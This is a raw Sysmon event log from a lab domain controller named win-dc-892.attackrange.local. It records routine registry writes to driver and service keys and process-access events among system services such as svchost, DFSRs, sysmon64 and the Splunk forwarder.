12:00:39.752{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xennet\Enum\0XENVIF\VEN_XS0001&DEV_NET&REV_0000000B\0 13241300x8000000000000000994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.737{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xenvif\Addresses\002:8d:48:bf:78:a4 13241300x8000000000000000993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.721{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x8000000000000000992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.721{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x8000000000000000991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.721{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosDataBinary Data 13241300x8000000000000000990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.721{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x8000000000000000989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.549{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Parameters\WppRecorder_TraceGuid{09281f1f-f66e-485a-99a2-91638f782c49} 13241300x8000000000000000988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.534{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\i8042prt\Parameters\WppRecorder_TraceGuid{7ffb8eb8-2c86-45d6-a7c5-c023d9c070c1} 
13241300x8000000000000000987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.409{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x8000000000000000986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.409{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x8000000000000000985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.409{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x8000000000000000984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.362{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\Psched\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.362{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\Psched\DriverMajorVersionDWORD (0x00000001) 13241300x8000000000000000982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.362{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\Psched\NdisMinorVersionDWORD (0x0000001e) 13241300x8000000000000000981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.362{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\Psched\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.362{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\DriverMinorVersionDWORD (0x00000000) 
13241300x8000000000000000979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.362{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\DriverMajorVersionDWORD (0x00000000) 13241300x8000000000000000978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.362{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\NdisMinorVersionDWORD (0x00000028) 13241300x8000000000000000977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.362{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.190{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\cdrom\Parameters\WppRecorder_TraceGuid{a4196372-c3c4-42d5-87bf-7edb2e9bcc27} 13241300x8000000000000000975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.018{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\volsnap\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.018{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\volsnap\Enum\CountDWORD (0x00000001) 13241300x8000000000000000973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.018{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\volsnap\Enum\0STORAGE\Volume\{492932f2-d455-11e9-aa46-806e6f6e6963}#0000000000100000 13241300x8000000000000000972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:00:39.018{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\volume\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.018{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\volume\Enum\CountDWORD (0x00000001) 13241300x8000000000000000970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.018{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\volume\Enum\0STORAGE\Volume\{492932f2-d455-11e9-aa46-806e6f6e6963}#0000000000100000 434400x8000000000000000969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local2021-03-31 12:01:01.408Started13.014.50 10341000x80000000000000002290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.995{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 
10341000x80000000000000002289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.995{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000002288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.994{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000002287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.994{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.994{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+5a1b8|C:\Windows\system32\wbem\wmiprvsd.dll+35a49|C:\Windows\system32\wbem\wmiprvsd.dll+2807f|C:\Windows\system32\wbem\wmiprvsd.dll+29591|C:\Windows\system32\wbem\wmiprvsd.dll+292c2|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.988{266CAFBE-647D-6064-3100-00000000AE01}26723236C:\Windows\system32\DFSRs.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\DFSRs.exe+d847d|C:\Windows\system32\DFSRs.exe+c1bd|C:\Windows\system32\DFSRs.exe+51c1|C:\Windows\system32\DFSRs.exe+73b2|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.984{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-4B00-00000000AE01}3728C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.982{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.982{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-4B00-00000000AE01}3728C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-647E-6064-4A00-00000000AE01}26123740C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-647E-6064-4B00-00000000AE01}3728C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.981{266CAFBE-647E-6064-4B00-00000000AE01}3728C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk 
